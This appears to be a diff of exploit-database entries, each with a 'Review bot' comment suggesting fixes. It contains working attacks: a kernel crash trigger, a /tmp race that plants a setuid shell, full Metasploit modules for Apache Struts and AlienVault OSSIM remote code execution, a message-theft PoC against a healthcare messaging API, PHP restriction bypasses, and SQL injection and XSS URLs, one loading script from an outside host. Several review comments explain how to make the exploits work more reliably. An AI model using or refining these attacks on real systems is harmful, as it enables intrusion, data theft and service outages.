The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.
This issue was introduced in Linux kernel 2.6.28-rc1 and fixed in 2.6.31-rc5-git3.
#include <time.h>
int main(void)
{
struct timespec ts;
ts.tv_sec = 1;
ts.tv_nsec = 0;
return clock_nanosleep(4, 0, &ts, NULL);
}
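Review bot: the four header lines (the source: URL and the three advisory sentences) are bare prose in a .c file, so this does not compile as shipped; wrap them in a /* ... */ block. The clock id is passed as the bare literal 4, and since the whole bug is in how posix-timers.c dispatches nanosleep for that one clock, a comment or the symbolic clockid_t constant should say which clock is meant. Also print the return value and errno rather than returning it from main, so a patched kernel (which returns an error instead of oopsing) gives visible output and a tester can tell "not vulnerable" from "silently exited".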

platforms/linux/local/33145.c Executable file
View file

@ -0,0 +1,38 @@
source: http://www.securityfocus.com/bid/35924/info
PHP Fuzzer Framework creates temporary files in an insecure manner.
An attacker with local access could potentially exploit this issue to overwrite and execute arbitrary code with the privileges of the victim user. Successfully exploiting this issue may compromise the affected application and possibly the computer.
#include <stdio.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/inotify.h>
#define FILEA "/tmp/PFF/fuzz0.php"
#define FILEB "/tmp/fuzzlol.php"
#define MODEZ (S_IRWXU | S_IRWXG | S_IRWXO)
int main(int argc, char *argv[])
{
int f,n,w;
char *s = "<? system(\"cp /bin/bash /tmp/sh; chmod 4777 /tmp/sh\"); ?>";
struct inotify_event e;
n = inotify_init();
printf("-=*************-\n");
if ((f = open(FILEB, O_CREAT | O_RDWR| O_EXCL, MODEZ)) > 0){
write(f, s, strlen(s));
close(f);
}
printf("[+] created abritrary code: %s\n", FILEB);
w = inotify_add_watch(n, "/tmp/PFF", IN_CREATE);
read(n, &e, sizeof(e));
rename(FILEB, FILEA);
printf("[+] %s => %s\n", FILEB, FILEA);
printf("[+] executing arbitrary code\n");
sleep(2);
printf("[+] racism complete \n");
execl("/tmp/sh", "/tmp/sh", 0);
}
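Review bot: `read(n, &e, sizeof(e))` cannot succeed: an IN_CREATE event on a watched directory carries the new file's name after the fixed header, and read(2) on an inotify descriptor fails with EINVAL when the buffer is smaller than the whole event, so the call returns -1 at once and the rename() is issued before the fuzzer has created anything; read into a buffer of at least sizeof(struct inotify_event) + NAME_MAX + 1, check the return value, and only then rename. The file also does not build as shipped: the three advisory lines at the top are not inside a comment, strlen/write/close/sleep/execl need <string.h> and <unistd.h>, and execl's terminating argument should be (char *)NULL rather than 0. Minor: the payload copies /bin/bash to /tmp/sh with mode 4777, but the program then execl()s /tmp/sh immediately after a fixed sleep(2) with no check that the copy exists, so a failed race ends with a silent exec failure rather than a message.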

View file

@ -0,0 +1,229 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking # It's going to manipulate the Class Loader
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts ClassLoader Manipulation Remote Code Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in Apache Struts
versions < 2.3.16.2. This issue is caused because the ParametersInterceptor allows
access to 'class' parameter which is directly mapped to getClass() method and
allows ClassLoader manipulation, which allows remote attackers to execute arbitrary
Java code via crafted parameters.
},
'Author' =>
[
'Mark Thomas', # Vulnerability Discovery
'Przemyslaw Celej', # Vulnerability Discovery
'pwntester <alvaro[at]pwntester.com>', # PoC
'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-0094'],
['CVE', '2014-0112'],
['URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'],
['URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html']
],
'Platform' => %w{ linux win },
'Payload' =>
{
'Space' => 5000,
'DisableNops' => true
},
'Targets' =>
[
['Java',
{
'Arch' => ARCH_JAVA,
'Platform' => %w{ linux win }
},
],
['Linux',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
['Windows',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
]
],
'DisclosureDate' => 'Mar 06 2014',
'DefaultTarget' => 1))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"])
], self.class)
end
def jsp_dropper(file, exe)
dropper = <<-eos
<%@ page import=\"java.io.FileOutputStream\" %>
<%@ page import=\"sun.misc.BASE64Decoder\" %>
<%@ page import=\"java.io.File\" %>
<% FileOutputStream oFile = new FileOutputStream(\"#{file}\", false); %>
<% oFile.write(new sun.misc.BASE64Decoder().decodeBuffer(\"#{Rex::Text.encode_base64(exe)}\")); %>
<% oFile.flush(); %>
<% oFile.close(); %>
<% File f = new File(\"#{file}\"); %>
<% f.setExecutable(true); %>
<% Runtime.getRuntime().exec(\"./#{file}\"); %>
eos
dropper
end
def dump_line(uri, cmd = "")
res = send_request_cgi({
'uri' => uri+cmd,
'version' => '1.1',
'method' => 'GET',
})
res
end
def modify_class_loader(opts)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s),
'version' => '1.1',
'method' => 'GET',
'vars_get' => {
"class['classLoader'].resources.context.parent.pipeline.first.directory" => opts[:directory],
"class['classLoader'].resources.context.parent.pipeline.first.prefix" => opts[:prefix],
"class['classLoader'].resources.context.parent.pipeline.first.suffix" => opts[:suffix],
"class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
}
})
res
end
def check_log_file(hint)
uri = normalize_uri("/", @jsp_file)
print_status("#{peer} - Waiting for the server to flush the logfile")
10.times do |x|
select(nil, nil, nil, 2)
# Now make a request to trigger payload
vprint_status("#{peer} - Countdown #{10-x}...")
res = dump_line(uri)
# Failure. The request timed out or the server went away.
fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") if res.nil?
# Success if the server has flushed all the sent commands to the jsp file
if res.code == 200 && res.body && res.body.to_s =~ /#{hint}/
print_good("#{peer} - Log file flushed at http://#{peer}/#{@jsp_file}")
return true
end
end
false
end
# Fix the JSP payload to make it valid once is dropped
# to the log file
def fix(jsp)
output = ""
jsp.each_line do |l|
if l =~ /<%.*%>/
output << l
elsif l =~ /<%/
next
elsif l.chomp.empty?
next
else
output << "<% #{l.chomp} %>"
end
end
output
end
def create_jsp
if target['Arch'] == ARCH_JAVA
jsp = fix(payload.encoded)
else
payload_exe = generate_payload_exe
payload_file = rand_text_alphanumeric(4 + rand(4))
jsp = jsp_dropper(payload_file, payload_exe)
register_files_for_cleanup(payload_file)
end
jsp
end
def exploit
prefix_jsp = rand_text_alphanumeric(3+rand(3))
date_format = rand_text_numeric(1+rand(4))
@jsp_file = prefix_jsp + date_format + ".jsp"
# Modify the Class Loader
print_status("#{peer} - Modifying Class Loader...")
properties = {
:directory => 'webapps/ROOT',
:prefix => prefix_jsp,
:suffix => '.jsp',
:file_date_format => date_format
}
res = modify_class_loader(properties)
unless res
fail_with(Failure::TimeoutExpired, "#{peer} - No answer")
end
# Check if the log file exists and hass been flushed
if check_log_file(normalize_uri(target_uri.to_s))
register_files_for_cleanup(@jsp_file)
else
fail_with(Failure::Unknown, "#{peer} - The log file hasn't been flushed")
end
# Prepare the JSP
print_status("#{peer} - Generating JSP...")
jsp = create_jsp
# Dump the JSP to the log file
print_status("#{peer} - Dumping JSP into the logfile...")
random_request = rand_text_alphanumeric(3 + rand(3))
jsp.each_line do |l|
unless dump_line(random_request, l.chomp)
fail_with(Failure::Unknown, "#{peer} - Missed answer while dumping JSP to logfile...")
end
end
# Check log file... enjoy shell!
check_log_file(random_request)
# No matter what happened, try to 'restore' the Class Loader
properties = {
:directory => '',
:prefix => '',
:suffix => '',
:file_date_format => ''
}
modify_class_loader(properties)
end
end
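Review bot: the final "restore" step sets directory, prefix, suffix and fileDateFormat to empty strings, which is not a restore: the original AccessLogValve values are never read, so after a run Tomcat is left logging to "" with no suffix, and the comment should say so (or the module should read the values first and put them back). Two environment assumptions are hard-coded where they should be options: `:directory => 'webapps/ROOT'` is relative to the Tomcat working directory and only yields http://host/<file>.jsp on the default layout, and the OGNL path `class['classLoader'].resources.context.parent.pipeline.first` assumes the AccessLogValve is the first valve in the Host pipeline; expose both as OptString so a non-default install is reachable. The dropper JSP uses sun.misc.BASE64Decoder, an internal class that newer JVMs no longer ship; java.util.Base64 on Java 8 and later is the portable choice. Minor: fix() silently skips any line that contains an unclosed "<%" rather than failing, and the hard-coded check_log_file budget of 10 x 2 seconds is not an option even though log flush interval varies by configuration.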

View file

@ -0,0 +1,87 @@
Affected Product
==================================
miSecureMessages from Amtelco - Tested on version: Client=4.0.1
Server=6.2.4552.30017
iOS: https://itunes.apple.com/us/app/misecuremessages/id423957478?mt=8
android: https://play.google.com/store/apps/details?id=com.amtelco.secure
website: https://misecuremessages.com/
Product Description
==================================
miSecureMessages is a secure, two-way instant smartphone and tablet
messaging Android™ App that uses encryption to keep your messages private.
Messages can be sent securely from device to device, and by using the
secure cloud-based or on-site directory solution. When you receive a
message from miSecureMessages, a Persistent Alert notifies you until you
acknowledge the message. You can view the message, and quickly send a
secure reply. miSecureMessages is perfect for healthcare and medical
professionals to protect patient PHI, as well as industries that need
secure instant messaging.
Vulnerability Details
==================================
----------------------------------
Session Management Vulnerability
----------------------------------
miSecureMessages lacks any sort of session management. Among other things,
this allows any user to modify the xml requests to retrieve other users
messages.
PoC(1):
POST /msmwebservice/service.asmx HTTP/1.1
Host: misecureserver.localhost.com
Proxy-Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=utf-8
Accept-Language: en-us
SOAPAction: http://amtelco.com/ssm/GetMessages
Connection: keep-alive
User-Agent: miSecureMessages/4.0.1 CFNetwork/672.0.8 Darwin/14.0.0
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="
http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetMessages xmlns="http://amtelco.com/ssm/">
<folders>1</folders><contactID>1</contactID><unreadOnly>false</unreadOnly><license>XXXX.X.XXXX</license></GetMessages>
</soap:Body>
</soap:Envelope>
Due to the lack of session management, it is possible to change the
<contactID> value to any valid contact ID and retrieve all messages for the
user associated with that contact ID.
----------------------------------
Authentication bypass vulnerability
----------------------------------
Authentication is not required to access messages, only the input of a
valid "license key". By modifying and sequentially enumerating through the
<contactID> it is possible to retrieve all messages without authenticating.
PoC(2):
POST /msmwebservice/service.asmx HTTP/1.1
Host: misecureserver.localhost.com
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 473
<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="
http://www.w3.org/2003/05/soap-envelope">
<soap12:Body>
<GetMessages xmlns="http://amtelco.com/ssm/">
<license>XXXX.X.XXXX</license>
<contactID>1</contactID>
<unreadOnly>false</unreadOnly>
<folders>1</folders>
</GetMessages>
</soap12:Body>
</soap12:Envelope>
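Review bot: the headings "Session Management Vulnerability" and "Authentication bypass vulnerability" describe one root cause, namely that `GetMessages` authorizes on nothing but the `<license>` value and a caller-chosen `<contactID>`, and the advisory gives no fixed version, vendor response or CVE, so a reader cannot tell whether the tested Client=4.0.1 / Server=6.2.4552.30017 builds are still current. Suggest adding a disclosure timeline and one remediation line: the server should derive the contact from a per-user authenticated session token and reject any `<contactID>` that the session does not own, so that `<license>` stops acting as a shared credential. Minor: the `Content-Length: 473` in PoC(2) should be verified against the body actually shown, since the request as pasted has no blank line between the headers and the XML.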

platforms/php/local/33161.php Executable file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/36007/info
PHP is prone to an 'open_basedir' restriction-bypass vulnerability because of a design error.
Successful exploits could allow an attacker to write files in unauthorized locations.
This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; in such cases, the 'safe_mode' and 'open_basedir' restrictions are expected to isolate users from each other.
PHP 5.3.0 is vulnerable.
<?php
$to = 'stop@example.com';
$subject = 'open_basedir bypass by http://securityreason.com';
$message = 'exploit';
$headers = 'From: stop@example.com' . "\r\n" .
'Reply-To: stop@example.com' . "\r\n" .
'X-Mailer: PHP<?php echo ini_get(\'open_basedir\');?>/' .
phpversion();
mail($to, $subject, $message, $headers);
?>
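Review bot: the description promises a write "in unauthorized locations", but the script only calls `mail()` with a crafted `X-Mailer` header and never sets a log or output path, so nothing in these lines shows where a file is written or how to observe the bypass; the entry should name the ini setting or log destination involved and the output that confirms it. Also `'X-Mailer: PHP<?php echo ini_get(\'open_basedir\');?>/'` is a single-quoted string literal, so the embedded `<?php` tag is sent as text and not evaluated here; if the intent is that it is executed later by whatever consumes the header, that should be stated.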

platforms/php/remote/33141.rb Executable file

@ -0,0 +1,356 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "AlienVault OSSIM SQL Injection and Remote Code Execution",
'Description' => %q{
This module exploits an unauthenticated SQL injection vulnerability affecting AlienVault
OSSIM versions 4.3.1 and lower. The SQL injection issue can be abused in order to retrieve an
active admin session ID. If an administrator level user is identified, remote code execution
can be gained by creating a high priority policy with an action containing our payload.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Sasha Zivojinovic', # SQLi discovery
'xistence <xistence[at]0x90.nl>' # Metasploit module
],
'References' =>
[
['OSVDB', '106252'],
['EDB', '33006']
],
'DefaultOptions' =>
{
'SSL' => true,
'WfsDelay' => 10
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'RequiredCmd' => 'generic perl python',
}
},
'Targets' =>
[
['Alienvault OSSIM 4.3', {}]
],
'Privileged' => true,
'DisclosureDate' => "Apr 24 2014",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/'])
], self.class)
end
def check
marker = rand_text_alpha(6)
sqli_rand = rand_text_numeric(4+rand(4))
sqli = "' and(select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(user() as char)),0x#{marker.unpack('H*')[0]})) "
sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'),
'vars_get' => { 'date_from' => sqli }
})
if res && res.code == 200 && res.body =~ /#{marker}726F6F7440[0-9a-zA-Z]+#{marker}/ # 726F6F7440 = root
return Exploit::CheckCode::Vulnerable
else
print_status("#{res.body}")
return Exploit::CheckCode::Safe
end
end
def exploit
marker = rand_text_alpha(6)
sqli_rand = rand_text_numeric(4+rand(4))
sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) "
sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"
print_status("#{peer} - Trying to grab admin session through SQLi")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'),
'vars_get' => { 'date_from' => sqli }
})
if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/
admin_session = $1
@cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*")
print_status("#{peer} - Admin session cookie is [ #{@cookie} ]")
else
fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session")
end
# Creating an Action containing our payload, which will be executed by any event (not only alarms)
action = rand_text_alpha(8+(rand(8)))
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "modifyactions.php"),
'cookie' => @cookie,
'vars_post' => {
'action' => 'new',
'action_name' => action,
'descr' => action,
'action_type' => '2',
'only' => 'on',
'cond' => 'True',
'exec_command' => payload.encoded
}
})
if res && res.code == 200
print_status("#{peer} - Created Action [ #{action} ]")
else
fail_with(Failure::Unknown, "#{peer} - Action creation failed!")
end
# Retrieving the Action ID, used to clean up the action after successful exploitation
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"),
'cookie' => @cookie,
'vars_post' => {
'page' => '1',
'rp' => '2000'
}
})
if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/
@action_id = $1
print_status("#{peer} - Action ID is [ #{@action_id} ]")
else
fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!")
end
# Retrieving the policy data, necessary for proper cleanup after succesful exploitation
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"),
'cookie' => @cookie,
'vars_get' => {
'm_opt' => 'configuration',
'sm_opt' => 'threat_intelligence',
'h_opt' => 'policy'
}
})
if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/
policy_ctx = $1
policy_group = $2
print_status("#{peer} - Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!")
else
fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!")
end
# Creating policy which will be triggered by any source/destination
policy = rand_text_alpha(8+(rand(8)))
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "newpolicy.php"),
'cookie' => @cookie,
'vars_post' => {
'descr' => policy,
'active' => '1',
'group' => policy_group,
'ctx' => policy_ctx,
'order' => '1', # Makes this the first policy, overruling all the other policies
'action' => 'new',
'sources[]' => '00000000000000000000000000000000', # Source is ANY
'dests[]' => '00000000000000000000000000000000', # Destination is ANY
'portsrc[]' => '0', # Any source port
'portdst[]' => '0', # Any destination port
'plug_type' => '1', # Taxonomy
'plugins[0]' => 'on',
'taxfilters[]' =>'20@13@118', # Product Type: Operating System, Category: Application, Subcategory: Web - Not Found
'tax_pt' => '0',
'tax_cat' => '0',
'tax_subc' => '0',
'mboxs[]' => '00000000000000000000000000000000',
'rep_act' => '0',
'rep_sev' => '1',
'rep_rel' => '1',
'rep_dir' => '0',
'ev_sev' => '1',
'ev_rel' => '1',
'tzone' => 'Europe/Amsterdam',
'date_type' => '1',
'begin_hour' => '0',
'begin_minute' => '0',
'begin_day_week' => '1',
'begin_day_month' => '1',
'begin_month' => '1',
'end_hour' => '23',
'end_minute' => '59',
'end_day_week' => '7',
'end_day_month' => '31',
'end_month' => '12',
'actions[]' => @action_id,
'sim' => '1',
'priority' => '1',
'qualify' => '1',
'correlate' => '0', # Don't make any correlations
'cross_correlate' => '0', # Don't make any correlations
'store' => '0' # We don't want to store anything :)
}
})
if res && res.code == 200
print_status("#{peer} - Created Policy [ #{policy} ]")
else
fail_with(Failure::Unknown, "#{peer} - Policy creation failed!")
end
# Retrieve policy ID, needed for proper cleanup after succesful exploitation
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "getpolicy.php"),
'cookie' => @cookie,
'vars_get' => {
'ctx' => policy_ctx,
'group' => policy_group
},
'vars_post' => {
'page' => '1',
'rp' => '2000'
}
})
if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/
@policy_id = $1
print_status("#{peer} - Policy ID [ #{@policy_id} ] retrieved!")
else
fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!")
end
# Reload the policies to make our new policy active
print_status("#{peer} - Reloading Policies")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),
'cookie' => @cookie,
'vars_get' => {
'what' => 'policies',
'back' => '../policy/policy.php'
}
})
if res && res.code == 200
print_status("#{peer} - Policies reloaded!")
else
fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")
end
# Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm.
dont_exist = rand_text_alpha(8+rand(4))
print_status("#{peer} - Triggering policy and action by requesting a non existing url")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, dont_exist),
'cookie' => @cookie
})
if res and res.code == 404
print_status("#{peer} - Payload delivered")
else
fail_with(Failure::Unknown, "#{peer} - Payload failed!")
end
end
def cleanup
begin
# Clean up, retrieve token so that the policy can be removed
print_status("#{peer} - Cleaning up")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"),
'cookie' => @cookie,
'vars_post' => { 'f_name' => 'delete_policy' }
})
if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/
token = $1
print_status("#{peer} - Token [ #{token} ] retrieved")
else
print_warning("#{peer} - Unable to retrieve token")
end
# Remove our policy
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"),
'cookie' => @cookie,
'vars_get' => {
'confirm' => 'yes',
'id' => @policy_id,
'token' => token
}
})
if res && res.code == 200
print_status("#{peer} - Policy ID [ #{@policy_id} ] removed")
else
print_warning("#{peer} - Unable to remove Policy ID")
end
# Remove our action
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"),
'cookie' => @cookie,
'vars_get' => {
'id' => @action_id,
}
})
if res && res.code == 200
print_status("#{peer} - Action ID [ #{@action_id} ] removed")
else
print_warning("#{peer} - Unable to remove Action ID")
end
# Reload the policies to revert back to the state before exploitation
print_status("#{peer} - Reloading Policies")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),
'cookie' => @cookie,
'vars_get' => {
'what' => 'policies',
'back' => '../policy/policy.php'
}
})
if res && res.code == 200
print_status("#{peer} - Policies reloaded!")
else
fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")
end
ensure
super # mixins should be able to cleanup even in case of Exception
end
end
end
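Review bot: in `check`, the `else` branch runs `print_status("#{res.body}")`, which raises NoMethodError when `send_request_cgi` returns nil (the `if res && res.code == 200 && ...` guard just above exists because it can), and dumping the whole response body for a Safe verdict is noise; a `vprint_status` guarded on `res` is enough. In `cleanup`, the `deletepolicy.php` and `deleteaction.php` requests are sent even when `@policy_id` or `@action_id` was never set because `exploit` failed earlier, and `token` is nil whenever the `token.php` lookup failed, so each deletion should be skipped unless its id and the token are present; the final `fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")` inside `cleanup` should be a `print_warning` like the other branches there, since raising from cleanup replaces the original error the user needs to see.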

platforms/php/remote/33162.php Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/36009/info
PHP is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
<?php
ini_set("session.save_path", "0123456789ABCDEF");
ini_restore("session.save_path");
session_start();
?>
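Review bot: the description says only that PHP "is prone to an information-disclosure vulnerability" and never states what is disclosed or how to see it; the script sets `session.save_path` to a bogus value, restores it with `ini_restore()` and calls `session_start()` without any output statement, so the reader cannot tell which observable (a warning text, a returned path, the value `ini_get` reports afterwards) demonstrates the issue. Add a line giving the expected output and the configuration in which it matters, and cross-reference 33163.php, which uses the same `ini_set` / `ini_restore` pattern against `open_basedir`.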

platforms/php/remote/33163.php Executable file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/36009/info
PHP is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
<?php
ini_set("open_basedir", "A");
ini_restore("open_basedir");
ini_get("open_basedir");
include("B");
?>
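Review bot: the return value of `ini_get("open_basedir");` is discarded and nothing is echoed, so the script produces no output of its own; the PoC needs `echo ini_get("open_basedir");` to show what the setting holds after `ini_restore()`. The `include("B");` line is a placeholder whose meaning the entry should spell out (which path `B` stands for relative to the configured `open_basedir`, and what message is expected), because the three-line description does not say which restriction the sequence defeats.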


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35920/info
Censura is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Censura 2.1.1 are vulnerable.
http://www.example.com/review/productSearch.html?search=1&amp;action=ProductSearch&amp;q=%3CSCRIPT%2FSRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&amp;vendorId=&amp;categoryId=&amp;submit=Search
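Review bot: the query separators in the example URI are HTML-escaped (`&amp;action=ProductSearch&amp;q=`), a scrape artifact from the source page, so the line does not reproduce the request as pasted; it should be stored with plain `&`. The `q=` value also decodes to a script tag that pulls `http://ha.ckers.org/xss.js` from a third-party host, which the entry should note is not needed to confirm the reflection; a self-contained value is a better test fixture.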

platforms/php/webapps/33146.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/35936/info
CS-Cart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to CS-Cart 2.0.6 are vulnerable.
The following example URI is available:
http://www.example.com/index.php?dispatch=reward_points.userlog&result_ids=pagination_contents&sort_by=timestamp&sort_order='

platforms/php/webapps/33147.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/35968/info
AJ Auction Pro is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
AJ Auction Pro 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?do=search&type=&stime=&txtkeyword=%27%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXss%3C%2FH1%3E%3C%2FMARQUEE%3E&id=all&button=Search&select2=all&select3=endsoon


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35979/info
OpenCms is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an authenticated attacker to obtain sensitive information, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OpenCms 7.5.0 is affected; other versions may also be vulnerable.
http://www.example.com/opencms/opencms/system/modules/org.opencms.workplace.help/jsptemplates/help_head.jsp?&homelink=>"&#039;><script>alert("This%20site%20has%20been%20compromised")</script>
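Review bot: `&#039;` in the `homelink=` value is an HTML entity left over from the source page, not part of the payload; the raw character is `'` and the line should be stored decoded so the entry reproduces as written. The description says "an authenticated attacker" but the URI gives no hint of the required workplace login or role, which the entry should state so the precondition is clear.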

platforms/php/webapps/33152.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/35996/info
PhotoPost PHP is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PhotoPost PHP 3.3.1 is vulnerable; other versions may also be affected.
http://www.example.com/showgallery.php?cat=[nr] and substring(@@version,1,1)=4 <= True
http://www.example.com/showgallery.php?cat=[nr] and substring(@@version,1,1)=5 <= False
http://www.example.com/showgallery.php?cat=&#039;"><script>alert(&#039;xss&#039;)</script>
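Review bot: `&#039;` on the third URL is undecoded entity residue and should be `'`; on the first two URLs the `[nr]` placeholder and the trailing `<= True` / `<= False` annotations are commentary rather than part of the request, and the file should set them apart (a separate comment line) so they are not copied into a request verbatim. The boolean pair compares `substring(@@version,1,1)` with 4 and 5, so the test is MySQL-specific and the entry should say so.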


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/36001/info
SupportPRO SupportDesk is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
SupportDesk 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/demo/shownews.php/"><script>alert(document.cookie);</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/36002/info
SQLiteManager is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
SQLiteManager 1.2.0 is vulnerable; other versions may also be affected.
http://www.example.com/main.php?redirect=<script>alert(&#039;Hadi Kiamarsi&#039;)</script>
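Review bot: `&#039;` inside the `redirect=` value is undecoded HTML entity residue from the source page; store the raw `'` so the line reproduces as pasted.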


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/36003/info
ViArt CMS is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
